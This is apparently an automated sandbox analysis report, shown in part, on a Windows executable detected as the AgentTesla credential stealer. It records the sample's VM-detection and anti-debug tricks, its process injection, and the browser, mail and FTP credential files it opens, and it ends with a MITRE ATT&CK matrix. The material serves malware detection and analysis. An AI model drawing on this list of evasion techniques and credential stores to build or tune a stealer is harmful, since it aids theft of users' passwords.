                      Source: C:\Users\user\Desktop\O53TFikPkp.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      barindex
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\O53TFikPkp.exe TID: 3144Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exe TID: 5528Thread sleep count: 8758 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exe TID: 5528Thread sleep count: 1093 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeWindow / User API: threadDelayed 8758Jump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeWindow / User API: threadDelayed 1093Jump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 1_2_00405D7C FindFirstFileA,FindClose,1_2_00405D7C
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 1_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_004053AA
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 1_2_00402630 FindFirstFileA,1_2_00402630
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 2_2_00404A29 FindFirstFileExW,2_2_00404A29
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeAPI call chain: ExitProcess graph end nodegraph_1-3617
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeAPI call chain: ExitProcess graph end nodegraph_1-3613
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeAPI call chain: ExitProcess graph end nodegraph_2-54460
                      Source: O53TFikPkp.exe, 00000002.00000002.925621657.0000000005A90000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 2_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0040446F
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 1_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00405DA3
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 2_2_004067FE GetProcessHeap,2_2_004067FE
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 1_2_0019E906 mov eax, dword ptr fs:[00000030h]1_2_0019E906
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 1_2_0019E6F2 mov eax, dword ptr fs:[00000030h]1_2_0019E6F2
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 1_2_0019EA34 mov eax, dword ptr fs:[00000030h]1_2_0019EA34
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 1_2_0019E9B7 mov eax, dword ptr fs:[00000030h]1_2_0019E9B7
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 1_2_0019E9F6 mov eax, dword ptr fs:[00000030h]1_2_0019E9F6
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 2_2_004035F1 mov eax, dword ptr fs:[00000030h]2_2_004035F1
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 2_2_0046B510 LdrInitializeThunk,2_2_0046B510
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeMemory allocated: page read and write | page guardJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 2_2_00401E1D SetUnhandledExceptionFilter,2_2_00401E1D
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 2_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0040446F
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 2_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00401C88
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 2_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00401F30

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeMemory written: C:\Users\user\Desktop\O53TFikPkp.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess created: C:\Users\user\Desktop\O53TFikPkp.exe "C:\Users\user\Desktop\O53TFikPkp.exe" Jump to behavior
                      Source: O53TFikPkp.exe, 00000002.00000002.923729585.0000000000EC0000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: O53TFikPkp.exe, 00000002.00000002.923729585.0000000000EC0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: O53TFikPkp.exe, 00000002.00000002.923729585.0000000000EC0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: O53TFikPkp.exe, 00000002.00000002.923729585.0000000000EC0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 2_2_0040208D cpuid 2_2_0040208D
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 2_2_00401B74 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_00401B74
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 1_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,1_2_00405AA7

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 2.2.O53TFikPkp.exe.25e0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.1.O53TFikPkp.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.O53TFikPkp.exe.415058.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.O53TFikPkp.exe.3635530.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.O53TFikPkp.exe.25e0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.O53TFikPkp.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.O53TFikPkp.exe.4970000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.O53TFikPkp.exe.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.O53TFikPkp.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.O53TFikPkp.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.O53TFikPkp.exe.3635530.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.O53TFikPkp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.O53TFikPkp.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.O53TFikPkp.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.O53TFikPkp.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.O53TFikPkp.exe.22c1458.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.O53TFikPkp.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.O53TFikPkp.exe.22b0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.O53TFikPkp.exe.415058.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.1.O53TFikPkp.exe.415058.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.O53TFikPkp.exe.22b0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.O53TFikPkp.exe.5646f8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.O53TFikPkp.exe.415058.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.O53TFikPkp.exe.22c1458.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.O53TFikPkp.exe.415058.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.1.O53TFikPkp.exe.415058.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.O53TFikPkp.exe.5646f8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.O53TFikPkp.exe.415058.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.O53TFikPkp.exe.415058.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000000.665781318.0000000000414000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.924721394.0000000003631000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.923015296.0000000000549000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.667167111.00000000022B0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000001.666315289.0000000000414000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.665066940.0000000000414000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.924840687.0000000004972000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.923912577.00000000025E0000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.922818649.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.923951407.0000000002631000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: O53TFikPkp.exe PID: 6712, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: O53TFikPkp.exe PID: 6892, type: MEMORYSTR
                      Tries to steal Mail credentials (via file / registry access)Show sources
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: Yara matchFile source: 00000002.00000002.923951407.0000000002631000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: O53TFikPkp.exe PID: 6892, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 2.2.O53TFikPkp.exe.25e0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.1.O53TFikPkp.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.O53TFikPkp.exe.415058.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.O53TFikPkp.exe.3635530.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.O53TFikPkp.exe.25e0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.O53TFikPkp.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.O53TFikPkp.exe.4970000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.O53TFikPkp.exe.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.O53TFikPkp.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.O53TFikPkp.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.O53TFikPkp.exe.3635530.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.O53TFikPkp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.O53TFikPkp.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.O53TFikPkp.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.O53TFikPkp.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.O53TFikPkp.exe.22c1458.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.O53TFikPkp.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.O53TFikPkp.exe.22b0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.O53TFikPkp.exe.415058.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.1.O53TFikPkp.exe.415058.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.O53TFikPkp.exe.22b0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.O53TFikPkp.exe.5646f8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.O53TFikPkp.exe.415058.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.O53TFikPkp.exe.22c1458.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.O53TFikPkp.exe.415058.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.1.O53TFikPkp.exe.415058.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.O53TFikPkp.exe.5646f8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.O53TFikPkp.exe.415058.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.O53TFikPkp.exe.415058.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000000.665781318.0000000000414000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.924721394.0000000003631000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.923015296.0000000000549000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.667167111.00000000022B0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000001.666315289.0000000000414000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.665066940.0000000000414000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.924840687.0000000004972000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.923912577.00000000025E0000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.922818649.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.923951407.0000000002631000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: O53TFikPkp.exe PID: 6712, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: O53TFikPkp.exe PID: 6892, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection112Disable or Modify Tools1OS Credential Dumping2System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
                      Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information1LSASS MemoryFile and Directory Discovery2Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information1Security Account ManagerSystem Information Discovery126SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing11NTDSQuery Registry1Distributed Component Object ModelClipboard Data1Scheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading11LSA SecretsSecurity Software Discovery231SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion131Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncVirtualization/Sandbox Evasion131Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
